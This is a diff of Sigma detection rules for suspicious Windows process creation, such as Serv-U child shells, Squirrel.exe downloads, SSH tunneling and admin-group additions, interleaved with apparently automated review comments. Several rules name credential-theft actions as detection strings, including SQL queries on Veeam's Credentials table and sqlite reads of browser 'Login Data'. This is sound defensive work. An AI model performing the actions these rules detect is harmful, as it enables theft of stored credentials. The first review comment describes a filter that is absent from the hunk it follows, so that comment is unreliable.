exploited - Serv-U service +description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service references: - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \Serv-U.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe @@ -31,7 +30,7 @@ detection: - \bash.exe - \schtasks.exe - \regsvr32.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \mshta.exe - \rundll32.exe - \msiexec.exe 
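Review bot: The new commented-out filter `# SubjectUserName|endswith: '$' SubjectUserName is from event ID 4719 in the Windows Security log` mixes a would-be YAML key with prose on one line and its explanation is misleading: this rule's logsource is EventID 4688 (visible at the top of the hunk), and 4688 carries its own `SubjectUserName` (the account that created the process), so the reference to 4719 does not explain why the filter is disabled. I would split it into a proper comment, e.g. `# Optional filter, currently disabled: exclude machine accounts (SubjectUserName ending in '$') that run secedit via policy processing` on one line and `# SubjectUserName|endswith: '$'` on the next, and drop or correct the 4719 remark. The `condition` line that follows is unchanged and would need `and not filter` appended if the filter is ever enabled.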
@@ -39,7 +38,6 @@ detection: - \scriptrunner.exe condition: process_creation and selection falsepositives: - - Legitimate uses in which users or programs use the SSH service of Serv-U for - remote command execution + - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml b/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml index 24eb5f215..41890e83f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml +++ b/sigma/builtin/process_creation/proc_creation_win_setspn_spn_enumeration.yml @@ -19,13 +19,13 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: \setspn.exe - - OriginalFileName: setspn.exe - - Description|contains|all: - - Query or reset the computer - - SPN attribute + - NewProcessName|endswith: \setspn.exe + - OriginalFileName: setspn.exe + - Description|contains|all: + - Query or reset the computer + - SPN attribute selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -q ' - ' /q ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml b/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml index 9cc897388..9e18aa185 100644 --- a/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_shutdown_execution.yml @@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - '/r ' - '/s ' - NewProcessName|endswith: \shutdown.exe + NewProcessName|endswith: \shutdown.exe condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml b/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml index 713a9c4ee..b165a4f10 100644 --- a/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml +++ b/sigma/builtin/process_creation/proc_creation_win_shutdown_logoff.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /l - NewProcessName|endswith: \shutdown.exe + CommandLine|contains: /l + NewProcessName|endswith: \shutdown.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml index dfa4afa78..b5c83d404 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sndvol_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Uncommon Child Processes Of SndVol.exe id: ba42babc-0666-4393-a4f7-ceaf5a69191e status: experimental -description: Detects potentially uncommon child processes of SndVol.exe (the Windows - volume mixer) +description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) references: - https://twitter.com/Max_Mal_/status/1661322732456353792 author: X__Junior (Nextron Systems) @@ -19,8 +18,8 @@ detection: selection: ParentProcessName|endswith: \SndVol.exe filter_main_rundll32: - CommandLine|contains: ' shell32.dll,Control_RunDLL ' - NewProcessName|endswith: \rundll32.exe + CommandLine|contains: ' shell32.dll,Control_RunDLL ' + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml b/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml index 0794a46cb..c8f6da4f4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_soundrecorder_audio_capture.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /FILE - NewProcessName|endswith: \SoundRecorder.exe + CommandLine|contains: /FILE + NewProcessName|endswith: \SoundRecorder.exe condition: process_creation and selection falsepositives: - Legitimate audio capture by legitimate user. diff --git a/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml index 0dae16cfb..b938f9591 100644 --- a/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_splwow64_cli_anomaly.yml @@ -18,8 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: splwow64.exe - NewProcessName|endswith: \splwow64.exe + CommandLine|endswith: splwow64.exe + NewProcessName|endswith: \splwow64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml index a2ee2918a..af3685bfd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml @@ -23,7 +23,7 @@ detection: ParentProcessName|endswith: \spoolsv.exe MandatoryLabel: S-1-16-16384 suspicious_unrestricted: - NewProcessName|endswith: + NewProcessName|endswith: - \gpupdate.exe - \whoami.exe - \nltest.exe 
@@ -48,39 +48,36 @@ detection: - \reg.exe - \query.exe suspicious_net: - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe suspicious_net_filter: - CommandLine|contains: start + CommandLine|contains: start suspicious_cmd: - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe suspicious_cmd_filter: - CommandLine|contains: + CommandLine|contains: - .spl - route add - program files suspicious_netsh: - NewProcessName|endswith: \netsh.exe + NewProcessName|endswith: \netsh.exe suspicious_netsh_filter: - CommandLine|contains: + CommandLine|contains: - add portopening - rule name suspicious_powershell: - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe suspicious_powershell_filter: - CommandLine|contains: .spl + CommandLine|contains: .spl suspicious_rundll32_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE suspicious_rundll32_cli: - CommandLine|endswith: rundll32.exe - condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net - and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) - or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell - and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) + CommandLine|endswith: rundll32.exe + condition: process_creation and (spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )) fields: - NewProcessName - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml index 22c993443..292358461 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml @@ -1,8 +1,7 @@ title: Veeam Backup Database Suspicious Query id: 696bfb54-227e-4602-ac5b-30d9d2053312 status: experimental -description: Detects potentially suspicious SQL queries using SQLCmd targeting the - Veeam backup databases in order to steal information. +description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information. references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection_sql: - CommandLine|contains|all: + CommandLine|contains|all: - VeeamBackup - 'From ' - NewProcessName|endswith: \sqlcmd.exe + NewProcessName|endswith: \sqlcmd.exe selection_db: - CommandLine|contains: + CommandLine|contains: - BackupRepositories - Backups - Credentials diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml index f252915cf..def9b718c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml @@ -19,9 +19,9 @@ detection: EventID: 4688 Channel: Security selection_tools: - NewProcessName|endswith: \sqlcmd.exe + NewProcessName|endswith: \sqlcmd.exe selection_query: - CommandLine|contains|all: + CommandLine|contains|all: - SELECT - TOP - '[VeeamBackup].[dbo].[Credentials]' diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml b/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml index 00d53234a..613a92b00 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml @@ -1,8 +1,7 @@ title: SQLite Chromium Profile Data DB Access id: 24c77512-782b-448a-8950-eddb0785fc71 status: test -description: Detect usage of the "sqlite" binary to query databases in Chromium-based - browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -23,20 +22,20 @@ detection: EventID: 4688 Channel: Security selection_sql: - - Product: SQLite - - NewProcessName|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - NewProcessName|endswith: + - \sqlite.exe + - \sqlite3.exe selection_chromium: - CommandLine|contains: - - \User Data\ - - \Opera Software\ - - \ChromiumViewer\ + CommandLine|contains: + - \User Data\ # Most common folder for user profile data among Chromium browsers + - \Opera Software\ # Opera + - \ChromiumViewer\ # Sleipnir (Fenrir) selection_data: - CommandLine|contains: - - Login Data + CommandLine|contains: + - Login Data # Passwords - Cookies - - Web Data + - Web Data # Credit cards, autofill data - History - Bookmarks condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml b/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml index e85d80fff..a532d81fe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml 
@@ -1,8 +1,7 @@ title: SQLite Firefox Profile Data DB Access id: 4833155a-4053-4c9c-a997-777fcea0baa7 status: test -description: Detect usage of the "sqlite" binary to query databases in Firefox and - other Gecko-based browsers for potential data stealing. +description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows - https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ @@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_sql: - - Product: SQLite - - NewProcessName|endswith: - - \sqlite.exe - - \sqlite3.exe + - Product: SQLite + - NewProcessName|endswith: + - \sqlite.exe + - \sqlite3.exe selection_firefox: - CommandLine|contains: + CommandLine|contains: - cookies.sqlite - - places.sqlite + - places.sqlite # Bookmarks, history condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml b/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml index 1dd87ac4f..59a0fe7b0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_squirrel_download.yml 
@@ -1,22 +1,18 @@ title: Arbitrary File Download Via Squirrel.EXE id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c related: - - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 45239e6a-b035-4aaf-b339-8ad379fcb67e + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" to download arbitrary files. - This binary is part of multiple Electron based software installations (Slack, - Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: 
@@ -31,19 +27,18 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \squirrel.exe - \update.exe selection_download_cli: - CommandLine|contains: + CommandLine|contains: - ' --download ' - ' --update ' - ' --updateRollback=' selection_download_http_keyword: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml b/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml index 66a8bc473..7b9ed78f7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_squirrel_proxy_execution.yml 
@@ -1,22 +1,18 @@ title: Process Proxy Execution Via Squirrel.EXE id: 45239e6a-b035-4aaf-b339-8ad379fcb67e related: - - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c - type: similar - - id: fa4b21c9-0057-4493-b289-2556416ae4d7 - type: obsoletes + - id: 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c + type: similar + - id: fa4b21c9-0057-4493-b289-2556416ae4d7 + type: obsoletes status: experimental -description: 'Detects the usage of the "Squirrel.exe" binary to execute arbitrary - processes. This binary is part of multiple Electron based software installations - (Slack, Teams, Discord, etc.) - - ' +description: | + Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/ - http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/ - http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ -author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan - Ribeiro, oscd.community +author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community date: 2022/06/09 modified: 2023/11/09 tags: 
@@ -31,47 +27,46 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \squirrel.exe - \update.exe selection_exec: - CommandLine|contains: + CommandLine|contains: - --processStart - --processStartAndWait - --createShortcut filter_optional_discord: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Discord\Update.exe - ' --processStart' - Discord.exe filter_optional_github_desktop: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\GitHubDesktop\Update.exe - GitHubDesktop.exe - CommandLine|contains: + CommandLine|contains: - --createShortcut - --processStartAndWait filter_optional_teams: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\Microsoft\Teams\Update.exe - Teams.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut filter_optional_yammer: - CommandLine|contains|all: + CommandLine|contains|all: - :\Users\ - \AppData\Local\yammerdesktop\Update.exe - Yammer.exe - CommandLine|contains: + CommandLine|contains: - --processStart - --createShortcut condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - - Expected FP with some Electron based applications such as (1Clipboard, Beaker - Browser, Caret, Discord, GitHub Desktop, etc.) + - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml b/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml index d0b28c3a1..18801fad0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssh_port_forward.yml 
@@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -R ' - ' /R ' - NewProcessName|endswith: \ssh.exe + NewProcessName|endswith: \ssh.exe condition: process_creation and selection falsepositives: - Administrative activity using a remote port forwarding to a local port diff --git a/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml b/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml index 2b4253168..26d0e3916 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssh_rdp_tunneling.yml @@ -1,11 +1,10 @@ title: Potential RDP Tunneling Via SSH id: f7d7ebd5-a016-46e2-9c54-f9932f2d386d related: - - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da - type: similar + - id: f38ce0b9-5e97-4b47-a211-7dc8d8b871da # plink.exe + type: similar status: test -description: Execution of ssh.exe to perform data exfiltration and tunneling through - RDP +description: Execution of ssh.exe to perform data exfiltration and tunneling through RDP references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: :3389 - NewProcessName|endswith: \ssh.exe + CommandLine|contains: :3389 + NewProcessName|endswith: \ssh.exe condition: process_creation and selection falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml index 54780bf3e..9f7dfb401 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ssm_agent_abuse.yml 
@@ -1,8 +1,7 @@ title: Potential Amazon SSM Agent Hijacking id: d20ee2f4-822c-4827-9e15-41500b1fff10 status: experimental -description: Detects potential Amazon SSM agent hijack attempts as outlined in the - Mitiga research report. +description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. references: - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ @@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-register ' - '-code ' - '-id ' - '-region ' - NewProcessName|endswith: \amazon-ssm-agent.exe + NewProcessName|endswith: \amazon-ssm-agent.exe condition: process_creation and selection falsepositives: - Legitimate activity of system administrators diff --git a/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml index f165b673b..ee91f48ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_stordiag_susp_child_process.yml @@ -1,8 +1,7 @@ title: Execution via stordiag.exe id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 status: test -description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe - and fltmc.exe +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe references: - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html - https://twitter.com/eral4m/status/1451112385041911809 
@@ -21,12 +20,12 @@ detection: Channel: Security selection: ParentProcessName|endswith: \stordiag.exe - NewProcessName|endswith: + NewProcessName|endswith: - \schtasks.exe - \systeminfo.exe - \fltmc.exe filter: - ParentProcessName|startswith: + ParentProcessName|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - c:\windows\system32\ - c:\windows\syswow64\ condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml b/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml index 0a3d66f61..90f0751dd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_16bit_application.yml @@ -1,9 +1,7 @@ title: Start of NT Virtual DOS Machine id: 16905e21-66ee-42fe-b256-1318ada2d770 status: test -description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit - Windows operating systems, as well as the execution of both 16-bit and 32-bit - DOS applications +description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications references: - https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support - https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7 @@ -22,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \ntvdm.exe - \csrstub.exe condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml b/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml index fbceb3abf..bf20ee27a 100644 
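Review bot: The comment added to the filter, `# as first is "Copy c:\windows\system32\stordiag.exe to a folder"`, does not read as a sentence and leaves the reader guessing why parents under System32/SysWOW64 are excluded. The filter's intent, as far as the rule shows, is that the technique first copies stordiag.exe out of its original directory, so executions whose parent still lives under `c:\windows\system32\` or `c:\windows\syswow64\` are treated as benign. Suggest rewording to `# the technique first copies stordiag.exe out of System32/SysWOW64, so parents still in those directories are excluded`.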
--- a/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml @@ -27,20 +27,20 @@ detection: - \wininit.exe - \spoolsv.exe - \searchindexer.exe - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - \cmd.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Cmd.Exe + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \cmd.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Cmd.Exe filter: - CommandLine|contains|all: + CommandLine|contains|all: - ' route ' - ' ADD ' condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml index 445fc75a5..a40823f92 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml @@ -1,11 +1,10 @@ title: Add User to Local Administrators Group id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 related: - - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e - type: similar + - id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups + type: similar status: test -description: Detects suspicious command line that adds an account to the local administrators/administrateurs - group +description: Detects suspicious command line that adds an account to the local administrators/administrateurs group references: - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) 
@@ -22,16 +21,18 @@ detection: EventID: 4688 Channel: Security selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + # net.exe + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + # powershell.exe + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - ' administrators ' - - ' administrateur' + - ' administrateur' # Typo without an 'S' so we catch both condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml index 0f9f16552..1b2145fe7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml @@ -1,11 +1,10 @@ title: Suspicious Add User to Remote Desktop Users Group id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e related: - - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 - type: similar + - id: ad720b90-25ad-43ff-9b5e-5c841facc8e5 # Admin groups + type: similar status: test -description: Detects suspicious command line in which a user gets added to the local - Remote Desktop Users group +description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group references: - https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/ author: Florian Roth (Nextron Systems) 
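Review bot: The new comment `# Typo without an 'S' so we catch both` on `' administrateur'` is misleading: the value is not a typo but a deliberately truncated string with no trailing space, so that both `administrateur` and `administrateurs` match, whereas the sibling `' administrators '` is space-terminated on both sides. Suggest `- ' administrateur' # deliberately no trailing 's'/space so both 'administrateur' and 'administrateurs' match`. The `# net.exe` and `# powershell.exe` annotations in selection_main are a useful addition and need no change.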
@@ -25,17 +24,17 @@ detection: EventID: 4688 Channel: Security selection_main: - - CommandLine|contains|all: - - 'localgroup ' - - ' /add' - - CommandLine|contains|all: - - 'Add-LocalGroupMember ' - - ' -Group ' + - CommandLine|contains|all: + - 'localgroup ' + - ' /add' + - CommandLine|contains|all: + - 'Add-LocalGroupMember ' + - ' -Group ' selection_group: - CommandLine|contains: + CommandLine|contains: - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml b/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml index b79f1cd79..501148724 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_alternate_data_streams.yml @@ -1,8 +1,7 @@ title: Execute From Alternate Data Streams id: 7f43c430-5001-4f8b-aaa9-c3b88f18fa5c status: test -description: Detects execution from an Alternate Data Stream (ADS). Adversaries may - use NTFS file attributes to hide their malicious data in order to evade detection +description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md author: frack113 
